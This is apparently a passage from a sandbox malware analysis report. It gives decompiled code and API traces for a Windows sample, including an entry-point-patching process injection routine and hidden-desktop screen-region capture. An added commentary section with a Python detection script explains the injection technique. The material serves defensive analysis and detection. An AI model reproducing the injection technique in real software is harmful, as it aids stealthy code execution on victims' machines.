                                          								continue;
                                          							}
                                          						}
                                          						goto L27;
                                          					}
                                          				}
                                          				E00C64854(_t120, _t174);
                                          				_t179 = _t114;
                                          				if(_t114 == 0) {
                                          					L12:
                                          					r14d =  *((intOrPtr*)(_t157 + 0x4a0));
                                          					L13:
                                          					E00C61E84();
                                          					goto L14;
                                          				}
                                          				r9d = 0x1000;
                                          				 *((long long*)(_t160 + 0x20)) = _t160 + 0x38;
                                          				if(ReadProcessMemory(??, ??, ??, ??, ??) == 0) {
                                          					goto L12;
                                          				}
                                          				_t117 = _t160 + 0x38;
                                          				_t148 =  *((intOrPtr*)(_t151 + 0x3c)) + _t179;
                                          				 *((long long*)(_t160 + 0x20)) = _t117;
                                          				r9d = 0x1000;
                                          				if(ReadProcessMemory(??, ??, ??, ??, ??) == 0) {
                                          					goto L12;
                                          				}
                                          				_t120 = _t120 + _t179;
                                          				_t18 = _t117 + 0x10; // 0xd0
                                          				_t68 =  ==  ? _t18 : 0xc0;
                                          				if( *((intOrPtr*)(_t117 + _t151)) == r12d ||  *((intOrPtr*)(_t117 + _t151 + 4)) == r12d) {
                                          					goto L12;
                                          				} else {
                                          					_t23 = _t171 + 0x28; // 0x28
                                          					r9d = _t23;
                                          					_t149 = _t148 + _t179;
                                          					 *((long long*)(_t160 + 0x20)) = _t160 + 0x38;
                                          					_t69 = ReadProcessMemory(??, ??, ??, ??, ??);
                                          					r14d =  *((intOrPtr*)(_t157 + 0x4a0));
                                          					if(_t69 == 0) {
                                          						goto L13;
                                          					}
                                          					if(r14d == 0) {
                                          						_t149 =  *((intOrPtr*)(_t160 + 0x68));
                                          					}
                                          					if(_t149 != 0) {
                                          						r9d = 0x1000;
                                          						 *((long long*)(_t160 + 0x20)) = _t160 + 0x38;
                                          						if(ReadProcessMemory(??, ??, ??, ??, ??) != 0) {
                                          							_t120 =  !=  ?  *_t151 : _t120;
                                          						}
                                          					}
                                          					goto L13;
                                          				}
                                          			}

                                          Statement addresses for E00C614F8 (one per decompiled statement, in listing order; the report's original side-by-side layout was flattened):
                                          0x00c614f8 0x00c614f8 0x00c614f8 0x00c614fd 0x00c61502 0x00c6150d
                                          0x00c61515 0x00c6151c 0x00c61525 0x00c6152b 0x00c61530 0x00c61538
                                          0x00c6153b 0x00c61542 0x00c61547 0x00c61551 0x00c61556 0x00c61559
                                          0x00c6155e 0x00c61561 0x00c6156a 0x00c61573 0x00c6157c 0x00c61581
                                          0x00c61587 0x00c61693 0x00c61693 0x00c61698 0x00c616a2 0x00c616a7
                                          0x00c616bd 0x00c6178c 0x00c61792 0x00000000 0x00c616ce 0x00c616ce
                                          0x00c616e5 0x00000000 0x00000000 0x00c616eb 0x00c616f0 0x00c616f4
                                          0x00c616ff 0x00c61709 0x00c61717 0x00c61725 0x00000000 0x00000000
                                          0x00c61729 0x00c61734 0x00c61739 0x00c61741 0x00c61744 0x00c61744
                                          0x00c6174f 0x00c61752 0x00c6175e 0x00c61764 0x00c61754 0x00c61757
                                          0x00c61757 0x00c61769 0x00c6176b 0x00c61771 0x00c61782 0x00c6178a
                                          0x00c61794 0x00c6179b 0x00c617a1 0x00c617a1 0x00c617aa 0x00c617af
                                          0x00c617af 0x00c617c9 0x00000000 0x00000000 0x00000000 0x00000000
                                          0x00000000 0x00000000 0x00c61729 0x00000000 0x00c616f0 0x00c616bd
                                          0x00c61590 0x00c61595 0x00c6159b 0x00c61684 0x00c61684 0x00c6168b
                                          0x00c6168e 0x00000000 0x00c6168e 0x00c615a6 0x00c615af 0x00c615c2
                                          0x00000000 0x00000000 0x00c615cc 0x00c615d1 0x00c615d4 0x00c615d9
                                          0x00c615ed 0x00000000 0x00000000 0x00c615fb 0x00c61607 0x00c6160a
                                          0x00c61611 0x00000000 0x00c6161a 0x00c6161d 0x00c6161d 0x00c61627
                                          0x00c6162f 0x00c61637 0x00c6163d 0x00c61646 0x00000000 0x00000000
                                          0x00c6164f 0x00c61651 0x00c61651 0x00c61659 0x00c61660 0x00c61669
                                          0x00c61679 0x00c6167e 0x00c6167e 0x00c61679 0x00000000 0x00c61659

                                          APIs
                                          • memset.NTDLL ref: 00C6152B
                                            • Part of subcall function 00C64E28: GetModuleHandleW.KERNEL32 ref: 00C64E4F
                                            • Part of subcall function 00C64E28: GetProcAddress.KERNEL32 ref: 00C64E5F
                                            • Part of subcall function 00C64E28: OpenProcess.KERNEL32 ref: 00C64E7F
                                            • Part of subcall function 00C64E28: CloseHandle.KERNEL32 ref: 00C64EAD
                                          • ReadProcessMemory.KERNEL32 ref: 00C615BA
                                          • ReadProcessMemory.KERNEL32 ref: 00C615E5
                                          • ReadProcessMemory.KERNEL32 ref: 00C61637
                                          • ReadProcessMemory.KERNEL32 ref: 00C61671
                                          • ReadProcessMemory.KERNEL32 ref: 00C616B5
                                          • ResumeThread.KERNEL32 ref: 00C616F4
                                          • Sleep.KERNEL32 ref: 00C616FF
                                          • SuspendThread.KERNEL32 ref: 00C61709
                                          • GetThreadContext.KERNEL32 ref: 00C6171D
                                          • SwitchToThread.KERNEL32 ref: 00C6176B
                                          • GetLastError.KERNEL32 ref: 00C6178C
                                          • ResumeThread.KERNEL32 ref: 00C617A1
                                            • Part of subcall function 00C64854: memset.NTDLL ref: 00C64871
                                            • Part of subcall function 00C64854: ZwQueryInformationProcess.NTDLL ref: 00C64893
                                            • Part of subcall function 00C64854: ReadProcessMemory.KERNEL32 ref: 00C648BD
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Process$MemoryRead$Thread$HandleResumememset$AddressCloseContextErrorInformationLastModuleOpenProcQuerySleepSuspendSwitch
                                          • String ID:
                                          • API String ID: 3455230186-0
                                          • Opcode ID: 59c4661fb3599875c7b3a62a560c74dc8eb81e5b060ec4f3e54e498cab2f0259
                                          • Instruction ID: 9c4765ba436aea54bb844f01328454a7656d2c78d391b036af0116d856e6a529
                                          • Opcode Fuzzy Hash: 59c4661fb3599875c7b3a62a560c74dc8eb81e5b060ec4f3e54e498cab2f0259
                                          • Instruction Fuzzy Hash: 2A71C076301B8186EB34DF22E8907AA7764FB84BCAF4C8125EE5A57B54DF38C549C700
                                          Uniqueness

                                          Uniqueness Score: -1.00%

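                                          Reading the E00C614F8 listing and its API references together: the function zeroes a 0x4d0-byte buffer (the size of an AMD64 CONTEXT), reads the target's PE headers with ReadProcessMemory, stores 0xccccfeeb (bytes EB FE CC CC, a jmp-to-self followed by int3 padding) and writes four bytes to the entry point, then resumes, sleeps 300 ms, suspends and calls GetThreadContext with ContextFlags 0x100003 (CONTEXT_CONTROL | CONTEXT_INTEGER), for up to 6000 ms, until the field at +0x78 from the frame register equals the entry point. Because ContextFlags is stored at -0x50 from that register and sits at offset 0x30 of CONTEXT, the compared field is Rip (offset 0xf8): the loop waits until the thread is parked on the patched entry point, does its work, writes four bytes again from a saved buffer and resumes. That E00C61DD8 is a write wrapper is inferred from its use; its body is not in this section. The script below is an added triage example, not part of the Joe Sandbox report or the sample: it decodes those constants from the listing against the documented winnt.h AMD64 CONTEXT layout and checks a constructed copy of the report's "APIs" lines for the read-headers / park-thread / poll-context / resume order.

```python
"""Triage helpers for the E00C614F8 listing (added example, not report code).

Constants are copied from the decompiled listing; CONTEXT offsets and flag
values are the documented AMD64 layout from winnt.h.  Deriving the CONTEXT
base from where ContextFlags is stored (frame - 0x50) is an inference."""
import re
import struct

# Constants copied from the listing.
ENTRY_PATCH_IMM = 0xCCCCFEEB      # stored at _t157 + 0x4b8, written with r9d = 4
CONTEXT_FLAGS_IMM = 0x100003      # stored at _t157 - 0x50
MEMSET_SIZE = 0x4D0               # r8d before memset
POLL_BUDGET_MS, POLL_STEP_MS = 0x1770, 0x12C
POLLED_FRAME_OFFSET, FLAGS_FRAME_OFFSET = 0x78, -0x50

# Documented AMD64 CONTEXT facts (winnt.h).
SIZEOF_CONTEXT_AMD64 = 0x4D0
CONTEXT_AMD64 = 0x00100000
CONTEXT_FIELDS = {0x30: "ContextFlags", 0x78: "Rax", 0x80: "Rcx", 0x98: "Rsp", 0xF8: "Rip"}

# Constructed copy of the report's "APIs" lines for E00C614F8 (bullets dropped,
# one subcall line kept to exercise the filter).
API_LISTING = """\
memset.NTDLL ref: 00C6152B
  Part of subcall function 00C64E28: OpenProcess.KERNEL32 ref: 00C64E7F
ReadProcessMemory.KERNEL32 ref: 00C615BA
ReadProcessMemory.KERNEL32 ref: 00C615E5
ReadProcessMemory.KERNEL32 ref: 00C61637
ReadProcessMemory.KERNEL32 ref: 00C61671
ReadProcessMemory.KERNEL32 ref: 00C616B5
ResumeThread.KERNEL32 ref: 00C616F4
Sleep.KERNEL32 ref: 00C616FF
SuspendThread.KERNEL32 ref: 00C61709
GetThreadContext.KERNEL32 ref: 00C6171D
SwitchToThread.KERNEL32 ref: 00C6176B
GetLastError.KERNEL32 ref: 00C6178C
ResumeThread.KERNEL32 ref: 00C617A1
"""


def describe_patch(imm: int) -> dict:
    """Decode a 32-bit immediate as the x86 bytes it becomes once written."""
    b = struct.pack("<I", imm)
    info = {"bytes": b.hex(" ").upper(), "self_loop": False, "int3_padding": False}
    if b[0] == 0xEB:                                  # jmp rel8
        rel = struct.unpack("<b", b[1:2])[0]
        info["jmp_target"] = 2 + rel                  # offset from the patch start
        info["self_loop"] = info["jmp_target"] == 0   # EB FE jumps to itself
        info["int3_padding"] = all(x == 0xCC for x in b[2:])
    return info


def decode_context_flags(flags: int) -> list:
    """Name the AMD64 ContextFlags bits set in flags."""
    if (flags & CONTEXT_AMD64) != CONTEXT_AMD64:
        return ["not-AMD64"]
    bits = ((0x1, "CONTEXT_CONTROL"), (0x2, "CONTEXT_INTEGER"), (0x4, "CONTEXT_SEGMENTS"),
            (0x8, "CONTEXT_FLOATING_POINT"), (0x10, "CONTEXT_DEBUG_REGISTERS"))
    return [name for bit, name in bits if flags & bit]


def polled_context_field(polled_off: int, flags_off: int) -> str:
    """CONTEXT field the poll loop compares with the entry point; ContextFlags
    is at offset 0x30, so the structure base is flags_off - 0x30."""
    base = flags_off - 0x30
    return CONTEXT_FIELDS.get(polled_off - base, "unknown")


def parse_api_refs(text: str, include_subcalls: bool = False) -> list:
    """Return [(address, api)] sorted by address; subcall lines skipped by default."""
    refs = []
    for line in text.splitlines():
        line = line.strip().lstrip("• ").strip()
        m = re.search(r"(\w+)\.(\w+) ref: ([0-9A-Fa-f]+)$", line)
        if m and (include_subcalls or not line.startswith("Part of subcall")):
            refs.append((int(m.group(3), 16), m.group(1)))
    return sorted(refs)


POLL_LOOP = ("ResumeThread", "Sleep", "SuspendThread", "GetThreadContext")


def match_entry_patch_pattern(refs: list) -> dict:
    """Flag the read-headers / park-thread / poll-context / resume sequence."""
    apis = [api for _, api in refs]
    loop_start = apis.index("ResumeThread") if "ResumeThread" in apis else -1
    poll_loop = loop_start >= 0 and tuple(apis[loop_start:loop_start + 4]) == POLL_LOOP
    header_reads = apis[:max(loop_start, 0)].count("ReadProcessMemory")
    final_resume = poll_loop and "ResumeThread" in apis[loop_start + 4:]
    return {"poll_loop": poll_loop, "header_reads_before_loop": header_reads,
            "final_resume": final_resume, "poll_iterations": POLL_BUDGET_MS // POLL_STEP_MS,
            "suspect": poll_loop and header_reads >= 2 and final_resume}


if __name__ == "__main__":
    print(describe_patch(ENTRY_PATCH_IMM), decode_context_flags(CONTEXT_FLAGS_IMM))
    print(polled_context_field(POLLED_FRAME_OFFSET, FLAGS_FRAME_OFFSET), MEMSET_SIZE == SIZEOF_CONTEXT_AMD64)
    print(match_entry_patch_pattern(parse_api_refs(API_LISTING)))
```

                                          The same sequence is what to look for in endpoint telemetry when hunting this primitive: a child created suspended, a 4-byte write at its entry point, repeated GetThreadContext calls against that thread, then a resume. The parser here works only on the report's "API ref" line format; the subcall lines (OpenProcess, ZwQueryInformationProcess) are excluded by default because they belong to callees, not to this function's own order.
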
                                          C-Code - Quality: 35%
                                          			E00C7D578(void* __ebx, signed int __edx, void* __esi, void* __esp, void* __eflags, signed int* __rax, long long __rbx, void* __rcx, long long __rdi, long long __rsi, signed int* __r8, void* __r9, void* __r10, void* __r11, long long _a8, long long _a16, long long _a24, long long _a32) {
                                          				void* _v40;
                                          				long long _v48;
                                          				long long _v56;
                                          				intOrPtr _v60;
                                          				intOrPtr _v64;
                                          				signed int _v68;
                                          				signed int _v72;
                                          				void* __rbp;
                                          				void* __r12;
                                          				void* __r13;
                                          				long _t43;
                                          				signed int _t53;
                                          				void* _t62;
                                          				void* _t63;
                                          				void* _t64;
                                          				void* _t72;
                                          				void* _t73;
                                          				void* _t76;
                                          				signed int* _t88;
                                          				void* _t90;
                                          				long long _t94;
                                          				long long _t113;
                                          				signed int* _t116;
                                          				signed int* _t118;
                                          				void* _t119;
                                          				void* _t120;
                                          				signed int* _t123;
                                          				void* _t126;
                                          				void* _t127;
                                          				void* _t128;
                                          				void* _t130;
                                          				void* _t131;
                                          				signed int* _t132;
                                          
                                          				_t128 = __r11;
                                          				_t127 = __r10;
                                          				_t126 = __r9;
                                          				_t123 = __r8;
                                          				_t113 = __rdi;
                                          				_t88 = __rax;
                                          				_t76 = __esp;
                                          				_t65 = __edx;
                                          				_t62 = __ebx;
                                          				_a16 = __rbx;
                                          				_a24 = __rsi;
                                          				_a32 = __rdi;
                                          				_t119 = _t120;
                                          				_t90 = __rcx;
                                          				_t72 = 0x21;
                                          				r12d = 0;
                                          				r13d = 0;
                                          				SetThreadDesktop(??);
                                          				E00C7D7C4();
                                          				r14d = r14d | 0xffffffff;
                                          				_t94 =  *((intOrPtr*)(_t90 + 0x760));
                                          				r9d = r14d;
                                          				_v56 =  *((intOrPtr*)(_t90 + 0x20));
                                          				r8d = 0;
                                          				_v48 = _t94;
                                          				_t10 = _t113 - 0x1f; // 0x2
                                          				_t63 = _t10;
                                          				_a8 = _t88;
                                          				_t116 = _t88;
                                          				_t43 = WaitForMultipleObjects(??, ??, ??, ??);
                                          				if(_t43 == 0) {
                                          					L23:
                                          					return _t43;
                                          				}
                                          				r15d = 0x1f4;
                                          				do {
                                          					if(_t43 != 1) {
                                          						if(_t43 != 0x102) {
                                          							goto L23;
                                          						}
                                          						L5:
                                          						if(E00C82BBC(_t62, _t63, _t65, _t88, _t126) <= 0x1e) {
                                          							_t73 = _t72 + 0xfffffff6;
                                          						} else {
                                          							_t73 = _t72 + 0xa;
                                          						}
                                          						_t74 =  <  ? 0x21 : _t73;
                                          						_t72 =  >  ? r15d :  <  ? 0x21 : _t73;
                                          						E00C7D7C4();
                                          						_t64 = _t72;
                                          						if(_t88 - _t116 < _t94) {
                                          							_t43 = WaitForSingleObject();
                                          							if(_t43 != 0x102) {
                                          								goto L23;
                                          							}
                                          						}
                                          						goto L10;
                                          					}
                                          					asm("movups xmm0, [ebx+0x70]");
                                          					r13d =  *(_t90 + 0x80);
                                          					r12d = _t43;
                                          					asm("movdqu [ebp-0x20], xmm0");
                                          					goto L5;
                                          					L10:
                                          					WaitForSingleObject();
                                          					E00C7D0E0(_t90, _t90,  &_v72, _t113, _t116, _t123, _t126);
                                          					ReleaseMutex(??);
                                          					if(r13d != 0) {
                                          						_t65 = r14d;
                                          						WaitForSingleObject(??, ??);
                                          						r8d = 1;
                                          						E00C7F004(_t90,  &_v72, _t123);
                                          						_t94 =  *((intOrPtr*)(_t90 + 0x768));
                                          						_t132 = _t88;
                                          						ReleaseMutex(??);
                                          						if(_t132 != 0) {
                                          							r8d = 0;
                                          							_t65 = 0;
                                          							_t53 = GetRegionData(??, ??, ??);
                                          							r14d = _t53;
                                          							if(_t53 != 0) {
                                          								r8d = r14d;
                                          								_t65 = 0;
                                          								HeapAlloc(??, ??, ??);
                                          								_t118 = _t88;
                                          								if(_t88 != 0) {
                                          									if(GetRegionData() != 0) {
                                          										_t68 =  *((intOrPtr*)(_t118 + 8));
                                          										if( *((intOrPtr*)(_t118 + 8)) != 0) {
                                          											_t33 = _t118 + 0x20; // 0x20
                                          											E00C6BF10(_t64, _t68, _t76, _t88, _t90,  *((intOrPtr*)(_t90 + 8)), _t118, _t119, _t33, _t126, _t127, _t128, _t130, _t131);
                                          										}
                                          									}
                                          									_t123 = _t118;
                                          									_t65 = 0;
                                          									HeapFree(??, ??, ??);
                                          								}
                                          								_t116 = _a8;
                                          							}
                                          							_t94 = _t132;
                                          							DeleteObject(??);
                                          							r14d = r14d | 0xffffffff;
                                          						}
                                          						r15d = 0x1f4;
                                          					} else {
                                          						_t123 =  &_v72;
                                          						_t94 =  *((intOrPtr*)(_t90 + 8));
                                          						_t20 = _t131 + 1; // 0x1
                                          						_t65 = _t20;
                                          						_v72 = _v72 & r13d;
                                          						_v68 = _v68 & r13d;
                                          						_v64 =  *((intOrPtr*)(_t90 + 0x294));
                                          						_v60 =  *((intOrPtr*)(_t90 + 0x298));
                                          						E00C6BF10(_t64, _t20, _t76, _t88, _t90, _t94, _t116, _t119, _t123, _t126, _t127, _t128, _t130, _t131);
                                          						r12d = 0;
                                          					}
                                          					r9d = r14d;
                                          					r9d =  !=  ? _t72 : r9d;
                                          					r8d = 0;
                                          					_t36 = _t123 + 2; // 0x2
                                          					_t63 = _t36;
                                          					_t43 = WaitForMultipleObjects(??, ??, ??, ??);
                                          				} while (_t43 != 0);
                                          				goto L23;
                                          			}


                                          APIs
                                          • SetThreadDesktop.USER32 ref: 00C7D5AC
                                            • Part of subcall function 00C7D7C4: GetSystemTime.KERNEL32(?,?,?,?,?,?,00C7D5B7), ref: 00C7D7CD
                                            • Part of subcall function 00C7D7C4: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,00C7D5B7), ref: 00C7D7DD
                                          • WaitForMultipleObjects.KERNEL32 ref: 00C7D5E2
                                          • WaitForSingleObject.KERNEL32 ref: 00C7D65B
                                          • WaitForSingleObject.KERNEL32 ref: 00C7D676
                                          • ReleaseMutex.KERNEL32 ref: 00C7D68F
                                          • WaitForSingleObject.KERNEL32 ref: 00C7D6D7
                                            • Part of subcall function 00C7F004: CreateRectRgn.GDI32 ref: 00C7F06C
                                            • Part of subcall function 00C7F004: Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00C7F20F
                                            • Part of subcall function 00C7F004: DeleteObject.GDI32 ref: 00C7F244
                                          • ReleaseMutex.KERNEL32 ref: 00C7D6F9
                                          • GetRegionData.GDI32 ref: 00C7D70C
                                          • HeapAlloc.KERNEL32 ref: 00C7D725
                                          • GetRegionData.GDI32 ref: 00C7D73C
                                          • HeapFree.KERNEL32 ref: 00C7D766
                                            • Part of subcall function 00C6BF10: EnterCriticalSection.KERNEL32 ref: 00C6BF3A
                                            • Part of subcall function 00C6BF10: LeaveCriticalSection.KERNEL32 ref: 00C6C004
                                          • DeleteObject.GDI32 ref: 00C7D773
                                          • WaitForMultipleObjects.KERNEL32 ref: 00C7D798
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
• Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
• Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
• Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
• Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ObjectWait$SingleTime$CriticalDataDeleteHeapMultipleMutexObjectsRegionReleaseSectionSystem$AllocCreateDesktopEnterFileFreeLeaveRectSleepThread
                                          • String ID:
                                          • API String ID: 1144057579-0
                                          • Opcode ID: da3be630a0ba1e40105d534cd6eeac71052ab4df365ac908b0c295fcf44478ee
                                          • Instruction ID: 074085b5288fe4a3f8037dba8410217485933fc513cb888fcb33b659c4742d3e
                                          • Opcode Fuzzy Hash: da3be630a0ba1e40105d534cd6eeac71052ab4df365ac908b0c295fcf44478ee
                                          • Instruction Fuzzy Hash: 59516D76700A4186EB10DF36D844BAE23B1FB88B98F54DA21DE1E97B58DF38C54AC700
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00C7F758: GetTickCount.KERNEL32 ref: 00C7F77B
                                            • Part of subcall function 00C7F758: lstrlenA.KERNEL32(?,?,?,00C6C267), ref: 00C7F7A7
                                            • Part of subcall function 00C7F758: HeapAlloc.KERNEL32(?,?,?,00C6C267), ref: 00C7F7C3
                                            • Part of subcall function 00C7F758: memset.NTDLL(?,?,?,00C6C267), ref: 00C7F7E0
                                            • Part of subcall function 00C7F758: CreateMutexA.KERNEL32(?,?,?,00C6C267), ref: 00C7F7F0
                                            • Part of subcall function 00C7F758: GetLastError.KERNEL32(?,?,?,00C6C267), ref: 00C7F879
                                            • Part of subcall function 00C7F758: HeapFree.KERNEL32(?,?,?,00C6C267), ref: 00C7F892
                                          • HeapAlloc.KERNEL32 ref: 00C6C2A8
                                          • memcpy.NTDLL ref: 00C6C342
                                          • memcpy.NTDLL ref: 00C6C355
                                          • GetLastError.KERNEL32 ref: 00C6C3BC
                                          • EnterCriticalSection.KERNEL32 ref: 00C6C3CB
                                          • LeaveCriticalSection.KERNEL32 ref: 00C6C3E3
                                          • shutdown.WS2_32 ref: 00C6C3F2
                                          • closesocket.WS2_32 ref: 00C6C3FC
                                          • HeapFree.KERNEL32 ref: 00C6C424
                                          • HeapFree.KERNEL32 ref: 00C6C43F
                                          • CloseHandle.KERNEL32 ref: 00C6C44E
                                          • DeleteCriticalSection.KERNEL32 ref: 00C6C45D
                                          • HeapFree.KERNEL32 ref: 00C6C46F
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
• Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
• Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
• Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
• Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Free$CriticalSection$AllocErrorLastmemcpy$CloseCountCreateDeleteEnterHandleLeaveMutexTickclosesocketlstrlenmemsetshutdown
                                          • String ID:
                                          • API String ID: 1415166864-0
                                          • Opcode ID: 92911cd3b9835e6d25c4c87bca1a78986f5affa537627ec70d6e988339faeff1
                                          • Instruction ID: 4dd01762604ba5ed42690db05405f4173cae318164d2e56a1efc3d6e8c67b3e8
                                          • Opcode Fuzzy Hash: 92911cd3b9835e6d25c4c87bca1a78986f5affa537627ec70d6e988339faeff1
                                          • Instruction Fuzzy Hash: 8D61C166200B9082EB24DF26D8947BC77A0FB98F94F488126DE9D87B25DF3CC556C350
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 28%
                                          			E00C7A6DC(void* __edx, intOrPtr* __rax, long long __rbx, void* __rcx, long long __rdx, long long __rsi, long long __rbp, void* __r8, void* __r9, long long _a8, long long _a16, long long _a24, intOrPtr _a40, intOrPtr _a48, intOrPtr _a56, long long* _a64) {
                                          				long long _v56;
                                          				void* __rdi;
                                          				long _t18;
                                          				void* _t37;
                                          				void* _t38;
                                          				long _t43;
                                          				intOrPtr* _t52;
                                          				long long _t54;
                                          				void* _t80;
                                          				intOrPtr _t81;
                                          				intOrPtr _t84;
                                          				void* _t87;
                                          				long long _t102;
                                          				intOrPtr* _t103;
                                          				intOrPtr* _t104;
                                          
                                          				_t54 = __rbx;
                                          				_t52 = __rax;
                                          				_t38 = __edx;
                                          				_a8 = __rbx;
                                          				_a16 = __rbp;
                                          				_a24 = __rsi;
                                          				_t102 = __rdx;
                                          				r13d = 0;
                                          				r15d = r13d;
                                          				_t87 = __r8;
                                          				_t80 = __rcx;
                                          				E00C7A500(__rbx, __rcx, _a40, __rcx, __r9);
                                          				_t103 = _t52;
                                          				if(_t52 != 0) {
                                          					E00C7A42C(_t37, _t38, _t52, _t54, _t87, __r9, _t87, __r9);
                                          					_v56 = _t102;
                                          					_t104 = _t52;
                                          					_t18 = E00C79F90(_t52, _t54, _t80, _a40, _t80, __r9, _t52, _t103);
                                          					_t43 = _t18;
                                          					if(_t18 == 0 || _t18 == 3) {
                                          						_t81 = _a48;
                                          						if(_t81 != 0) {
                                          							lstrlenW();
                                          						}
                                          						_t84 = _a56;
                                          						if(_t84 != 0) {
                                          							lstrlenW();
                                          						}
                                          						lstrlenW();
                                          						HeapAlloc(??, ??, ??);
                                          						_t54 = _t52;
                                          						if(_t52 != 0) {
                                          							if(_t81 == 0) {
                                          								 *_t52 = r13w;
                                          							} else {
                                          								lstrcpyW();
                                          							}
                                          							lstrcatW();
                                          							lstrcatW(??, ??);
                                          							lstrcatW(??, ??);
                                          							if(_t84 != 0) {
                                          								lstrcatW();
                                          							}
                                          							_t43 = r13d;
                                          							goto L17;
                                          						} else {
                                          							_t11 = _t52 + 8; // 0x8
                                          							_t43 = _t11;
                                          							goto L21;
                                          						}
                                          					} else {
                                          						goto L17;
                                          					}
                                          				} else {
                                          					_t43 = GetLastError();
                                          					L17:
                                          					if(_t43 == 0) {
                                          						 *_a64 = _t54;
                                          					} else {
                                          						if(_t54 != 0) {
                                          							HeapFree();
                                          						}
                                          					}
                                          					L21:
                                          					if(_t104 != 0) {
                                          						HeapFree();
                                          					}
                                          					if(_t103 != 0) {
                                          						HeapFree();
                                          					}
                                          					return _t43;
                                          				}
                                          			}



                                          APIs
                                            • Part of subcall function 00C7A500: GetTempPathW.KERNEL32(?,?,?,00000000,00000000,00C766DF), ref: 00C7A52B
                                            • Part of subcall function 00C7A500: GetLastError.KERNEL32(?,?,?,00000000,00000000,00C766DF), ref: 00C7A537
                                            • Part of subcall function 00C7A500: HeapFree.KERNEL32(?,?,?,00000000,00000000,00C766DF), ref: 00C7A661
                                          • GetLastError.KERNEL32(?,?,?,?,?,00C76E21), ref: 00C7A722
                                          • lstrlenW.KERNEL32(?,?,?,?,?,00C76E21), ref: 00C7A77A
                                          • lstrlenW.KERNEL32(?,?,?,?,?,00C76E21), ref: 00C7A793
                                          • lstrlenW.KERNEL32(?,?,?,?,?,00C76E21), ref: 00C7A7A4
                                          • HeapAlloc.KERNEL32(?,?,?,?,?,00C76E21), ref: 00C7A7C0
                                          • HeapFree.KERNEL32(?,?,?,?,?,00C76E21), ref: 00C7A83F
                                          • HeapFree.KERNEL32(?,?,?,?,?,00C76E21), ref: 00C7A863
                                          • HeapFree.KERNEL32(?,?,?,?,?,00C76E21), ref: 00C7A87A
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
• Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
• Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
• Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
• Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Free$lstrlen$ErrorLast$AllocPathTemp
                                          • String ID:
                                          • API String ID: 547147443-0
                                          • Opcode ID: a3cb981e41cfd0dc8b6aadb3b01a9376ca9b9713a08df61940ad41ec5ae7dd0b
                                          • Instruction ID: a74b0f6550fd5af739546ddbc2c7d5f580d8eaaa2cb8c2cce33e254f4b924feb
                                          • Opcode Fuzzy Hash: a3cb981e41cfd0dc8b6aadb3b01a9376ca9b9713a08df61940ad41ec5ae7dd0b
                                          • Instruction Fuzzy Hash: B9418025704F8182EB299F23B854B2AA361BBC4FE4F58C125DD5E47B29DF3CC54A8305
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00C801F5
                                          • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00C80218
                                          • CreateFileW.KERNEL32 ref: 00C80241
                                          • GetLastError.KERNEL32 ref: 00C80250
                                          • SetFilePointerEx.KERNEL32 ref: 00C8026C
                                          • SetFilePointerEx.KERNEL32 ref: 00C8027F
                                          • ReadFile.KERNEL32 ref: 00C802B8
                                          • SetFilePointerEx.KERNEL32 ref: 00C802DC
                                          • SetEndOfFile.KERNEL32 ref: 00C802E5
                                          • CloseHandle.KERNEL32 ref: 00C802EE
                                          • DeleteFileW.KERNEL32 ref: 00C802FB
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
• Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
• Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
• Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
• Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: File$Pointer$Handle$CloseCreateDeleteErrorInformationLastReadmemset
                                          • String ID:
                                          • API String ID: 3299833539-0
                                          • Opcode ID: d07bbc1b573347febf1aa77af4760e5035d12f1194af09bdfc3408afbebd1699
                                          • Instruction ID: 56ac64cc585fff43c7e94f817c89d966e0342d13003227ffce1493cd9914c816
